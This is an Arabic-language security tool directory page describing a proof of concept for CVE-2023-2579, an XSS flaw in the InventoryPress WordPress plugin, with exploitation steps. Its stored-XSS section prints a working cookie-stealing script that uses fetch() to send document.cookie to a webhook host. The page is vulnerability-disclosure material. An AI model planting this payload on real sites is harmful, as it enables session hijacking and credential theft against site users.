Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
poc-cve-xss-inventory-press-plugin — إثبات المفهوم لـ CVE-2023-2579 | Kitploit
أدوات/GitHubGitHub/0xn4d/poc-cve-xss-inventory-press-plugin
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHub0xn4d/poc-cve-xss-inventory-press-plugin

poc-cve-xss-inventory-press-plugin

إثبات المفهوم لـ CVE-2023-2579

عرض المستودع
12منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تحديث - 6-23-2023

تم حجز معرف CVE-2023-2579 ونشر الإثبات المفاهيمي في موقع WPScan: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe

التفاصيل

العنوان: ثغرة برمجة نصية عبر المواقع (XSS) منعكسة وموثقة في إضافة InventoryPress لنظام إدارة المحتوى ووردبريس
التاريخ: 2023-04-21
المؤلف: Danilo Albuquerque
الصفحة الرئيسية للبائع: https://wordpress.org
رابط البرنامج: https://wordpress.org/download
الإصدار: ووردبريس 6.2
اسم الإضافة وإصدارها: InventoryPress 1.7
تم الاختبار على: Brave (الإصدار 1.50.119 Chromium: 112.0.5615.121 (الإصدار الرسمي) 64 بت)

الإثبات المفاهيمي لثغرة XSS المنعكسة في InventoryPress 1.7

  1. انتقل إلى الصفحة التي يمكنك من خلالها إضافة العناصر إلى المخزون؛
  2. أضف الحمولة الخبيثة إلى حقل "الوصف" في النموذج؛
  3. قم بالوصول إلى رابط العنصر الجديد الذي تم إنشاؤه بواسطة الإضافة؛

عند القيام بكل ذلك وتحديث الصفحة الحالية، ستظهر لك نافذة منبثقة للتنبيه تحتوي على الرسالة.

لقطات الشاشة أدناه

  1. انتقل إلى الصفحة التي يمكنك من خلالها إضافة العناصر إلى المخزون:
    image

  • أضف الحمولة الخبيثة إلى حقل "الوصف" في النموذج:
    image

  • قم بالوصول إلى رابط العنصر الجديد الذي تم إنشاؤه بواسطة الإضافة:
    image

  • بمجرد اكتمال الطلب، تظهر النافذة المنبثقة للتنبيه:
    image

  • إضافي - الإثبات المفاهيمي لثغرة XSS المخزنة

    1. أضف الحمولة التالية لسرقة ملفات تعريف الارتباط في حقل "الوصف": <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. ثم انشر العنصر الجديد، أو قم بتحديث عنصر قديم؛

    2. قم بتشغيلها واحصل على بيانات الاعتماد في موقع Webhook

    3. إضافة الحمولة ونشر العنصر (أو تحديثه): image

    4. التشغيل والحصول على بيانات الاعتماد: image

    تنزيل الأداة